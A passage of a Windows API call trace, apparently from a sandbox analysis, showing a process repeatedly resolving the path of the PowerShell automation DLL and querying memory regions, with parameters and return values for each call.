	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.070] GetLastError () returned 0x0
	[0162.071] VirtualQuery (in: lpAddress=0x10d324, lpBuffer=0x10e324, dwLength=0x1c | out: lpBuffer=0x10e324*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.071] GetLastError () returned 0x0
	[0162.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.071] GetLastError () returned 0x0
	[0162.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.071] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.072] GetLastError () returned 0x0
	[0162.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.073] GetLastError () returned 0x0
	[0162.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.073] GetLastError () returned 0x0
	[0162.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.073] GetLastError () returned 0x0
	[0162.073] VirtualQuery (in: lpAddress=0x10d324, lpBuffer=0x10e324, dwLength=0x1c | out: lpBuffer=0x10e324*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.073] GetLastError () returned 0x0
	[0162.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.073] GetLastError () returned 0x0
	[0162.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.073] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.074] GetLastError () returned 0x0
	[0162.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.075] GetLastError () returned 0x0
	[0162.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.075] GetLastError () returned 0x0
	[0162.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.075] GetLastError () returned 0x0
	[0162.075] VirtualQuery (in: lpAddress=0x10d324, lpBuffer=0x10e324, dwLength=0x1c | out: lpBuffer=0x10e324*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.075] GetLastError () returned 0x0
	[0162.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.075] GetLastError () returned 0x0
	[0162.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.075] GetLastError () returned 0x0
	[0162.075] VirtualQuery (in: lpAddress=0x10d324, lpBuffer=0x10e324, dwLength=0x1c | out: lpBuffer=0x10e324*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.076] GetLastError () returned 0x0
	[0162.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.076] GetLastError () returned 0x0
	[0162.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.076] GetLastError () returned 0x0
	[0162.076] VirtualQuery (in: lpAddress=0x10cf54, lpBuffer=0x10df54, dwLength=0x1c | out: lpBuffer=0x10df54*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.077] VirtualQuery (in: lpAddress=0x10cf90, lpBuffer=0x10df90, dwLength=0x1c | out: lpBuffer=0x10df90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.077] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.077] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.078] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.078] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.078] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.078] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.078] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.079] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.079] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.079] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.080] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.080] VirtualQuery (in: lpAddress=0x10d0fc, lpBuffer=0x10e0fc, dwLength=0x1c | out: lpBuffer=0x10e0fc*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.080] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.081] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.081] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.081] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.082] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x697402f7, Data2=0x4192, Data3=0x4122, Data4=([0]=0xbd, [1]=0xc9, [2]=0xc6, [3]=0x49, [4]=0xd5, [5]=0x59, [6]=0xf6, [7]=0xc5))) returned 0x0
	[0162.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.082] GetLastError () returned 0x0
	[0162.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.082] GetLastError () returned 0x0
	[0162.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.082] GetLastError () returned 0x0
	[0162.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.082] GetLastError () returned 0x0
	[0162.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.082] GetLastError () returned 0x0
	[0162.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.082] GetLastError () returned 0x0
	[0162.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.083] GetLastError () returned 0x0
	[0162.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.083] GetLastError () returned 0x0
